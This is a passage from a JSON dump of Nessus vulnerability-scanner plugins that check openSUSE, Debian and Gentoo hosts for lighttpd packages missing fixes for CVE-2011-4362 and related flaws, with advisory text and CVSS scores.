security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of lighttpd fixes an out-of-bounds read due to a\nsignedness error which could cause a Denial of Service\n(CVE-2011-4362). Additionally an option was added to honor the server\ncipher order (resolves lighttpd#2364).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=733607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-02/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-debugsource-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_cml-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_cml-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_magnet-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_magnet-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_mysql_vhost-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_mysql_vhost-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_rrdtool-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_rrdtool-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_trigger_b4_dl-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_webdav-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_webdav-debuginfo-1.4.26-6.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-mod_cml / lighttpd-mod_magnet / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T12:24:18", "description": " - added lighttpd-1.4.30_head_fixes.patch: cherry picked 4\n fixes from HEAD :\n\n - [ssl] include more headers explicitly\n\n - list all network handlers in lighttpd -V (fixes\n lighttpd#2376)\n\n - Move fdevent subsystem includes to implementation files\n to reduce conflicts (fixes lighttpd#2373)\n\n - [ssl] fix segfault in counting renegotiations for\n openssl versions without TLSEXT/SNI\n\n - update to 1.4.30: (bnc#733607)\n\n - Always use our ‘own’ md5 implementation,\n fixes linking issues on MacOS (fixes #2331)\n\n - Limit amount of bytes we send in one go; fixes stalling\n in one connection and timeouts on slow systems.\n\n - [ssl] fix build errors when Elliptic-Curve\n Diffie-Hellman is disabled\n\n - Add static-file.disable-pathinfo option to prevent\n handling of urls like …/secret.php/image.jpg as\n static file\n\n - Don’t overwrite 401 (auth required) with 501\n (unknown method) (fixes #2341)\n\n - Fix mod_status bug: always showed “0/0” in\n the “Read” column for uploads (fixes #2351)\n\n - [mod_auth] Fix signedness error in http_auth (fixes\n #2370, CVE-2011-4362)\n\n - [ssl] count renegotiations to prevent client\n renegotiations\n\n - [ssl] add option to honor server cipher order (fixes\n #2364, BEAST attack)\n\n - [core] accept dots in ipv6 addresses in host header\n (fixes #2359)\n\n - [ssl] fix ssl connection aborts if files are larger than\n the MAX_WRITE_LIMIT (256kb)\n\n - [libev/cgi] fix waitpid ECHILD errors in cgi with libev\n (fixes #2324)\n\n - add automake as buildrequire to avoid implicit\n dependency", "edition": 17, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : lighttpd (openSUSE-2012-110)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_webdav", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:lighttpd-mod_geoip-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_geoip", "p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool", "p-cpe:/a:novell:opensuse:lighttpd", "p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost", "p-cpe:/a:novell:opensuse:lighttpd-mod_magnet", "p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-debugsource", "p-cpe:/a:novell:opensuse:lighttpd-mod_cml", "p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl"], "id": "OPENSUSE-2012-110.NASL", "href": "https://www.tenable.com/plugins/nessus/74546", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-110.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74546);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4362\");\n\n script_name(english:\"openSUSE Security Update : lighttpd (openSUSE-2012-110)\");\n script_summary(english:\"Check for the openSUSE-2012-110 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - added lighttpd-1.4.30_head_fixes.patch: cherry picked 4\n fixes from HEAD :\n\n - [ssl] include more headers explicitly\n\n - list all network handlers in lighttpd -V (fixes\n lighttpd#2376)\n\n - Move fdevent subsystem includes to implementation files\n to reduce conflicts (fixes lighttpd#2373)\n\n - [ssl] fix segfault in counting renegotiations for\n openssl versions without TLSEXT/SNI\n\n - update to 1.4.30: (bnc#733607)\n\n - Always use our ‘own’ md5 implementation,\n fixes linking issues on MacOS (fixes #2331)\n\n - Limit amount of bytes we send in one go; fixes stalling\n in one connection and timeouts on slow systems.\n\n - [ssl] fix build errors when Elliptic-Curve\n Diffie-Hellman is disabled\n\n - Add static-file.disable-pathinfo option to prevent\n handling of urls like …/secret.php/image.jpg as\n static file\n\n - Don’t overwrite 401 (auth required) with 501\n (unknown method) (fixes #2341)\n\n - Fix mod_status bug: always showed “0/0” in\n the “Read” column for uploads (fixes #2351)\n\n - [mod_auth] Fix signedness error in http_auth (fixes\n #2370, CVE-2011-4362)\n\n - [ssl] count renegotiations to prevent client\n renegotiations\n\n - [ssl] add option to honor server cipher order (fixes\n #2364, BEAST attack)\n\n - [core] accept dots in ipv6 addresses in host header\n (fixes #2359)\n\n - [ssl] fix ssl connection aborts if files are larger than\n the MAX_WRITE_LIMIT (256kb)\n\n - [libev/cgi] fix waitpid ECHILD errors in cgi with libev\n (fixes #2324)\n\n - add automake as buildrequire to avoid implicit\n dependency\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=733607\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_geoip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_geoip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-debugsource-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_cml-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_cml-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_geoip-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_geoip-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_magnet-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_magnet-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_mysql_vhost-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_mysql_vhost-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_rrdtool-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_rrdtool-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_trigger_b4_dl-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_webdav-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_webdav-debuginfo-1.4.30-2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-debuginfo / lighttpd-debugsource / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T09:47:09", "description": "Several vulnerabilities have been discovered in lighttpd, a small and\nfast webserver with minimal memory footprint.\n\n - CVE-2011-4362\n Xi Wang discovered that the base64 decoding routine\n which is used to decode user input during an HTTP\n authentication, suffers of a signedness issue when\n processing user input. As a result it is possible to\n force lighttpd to perform an out-of-bounds read which\n results in Denial of Service conditions.\n\n - CVE-2011-3389\n When using CBC ciphers on an SSL enabled virtual host to\n communicate with certain client, a so called 'BEAST'\n attack allows man-in-the-middle attackers to obtain\n plaintext HTTP traffic via a blockwise chosen-boundary\n attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a\n workaround to mitigate this problem by providing a\n possibility to disable CBC ciphers.\n\n This updates includes this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break\n older clients).", "edition": 17, "published": "2012-01-12T00:00:00", "title": "Debian DSA-2368-1 : lighttpd - multiple vulnerabilities (BEAST)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "modified": "2012-01-12T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:lighttpd", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-2368.NASL", "href": "https://www.tenable.com/plugins/nessus/57508", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2368. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57508);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-4362\");\n script_bugtraq_id(49778, 50851);\n script_xref(name:\"DSA\", value:\"2368\");\n\n script_name(english:\"Debian DSA-2368-1 : lighttpd - multiple vulnerabilities (BEAST)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in lighttpd, a small and\nfast webserver with minimal memory footprint.\n\n - CVE-2011-4362\n Xi Wang discovered that the base64 decoding routine\n which is used to decode user input during an HTTP\n authentication, suffers of a signedness issue when\n processing user input. As a result it is possible to\n force lighttpd to perform an out-of-bounds read which\n results in Denial of Service conditions.\n\n - CVE-2011-3389\n When using CBC ciphers on an SSL enabled virtual host to\n communicate with certain client, a so called 'BEAST'\n attack allows man-in-the-middle attackers to obtain\n plaintext HTTP traffic via a blockwise chosen-boundary\n attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a\n workaround to mitigate this problem by providing a\n possibility to disable CBC ciphers.\n\n This updates includes this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break\n older clients).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=652726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/lighttpd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2368\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lighttpd packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19-5+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"lighttpd\", reference:\"1.4.19-5+lenny3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-doc\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-cml\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-magnet\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-mysql-vhost\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-trigger-b4-dl\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-webdav\", reference:\"1.4.28-2+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T10:55:49", "description": "The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 21, "published": "2014-06-16T00:00:00", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "modified": "2014-06-16T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "id": "GENTOO_GLSA-201406-10.NASL", "href": "https://www.tenable.com/plugins/nessus/76062", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76062);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/lighttpd\", unaffected:make_list(\"ge 1.4.35\"), vulnerable:make_list(\"lt 1.4.35\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 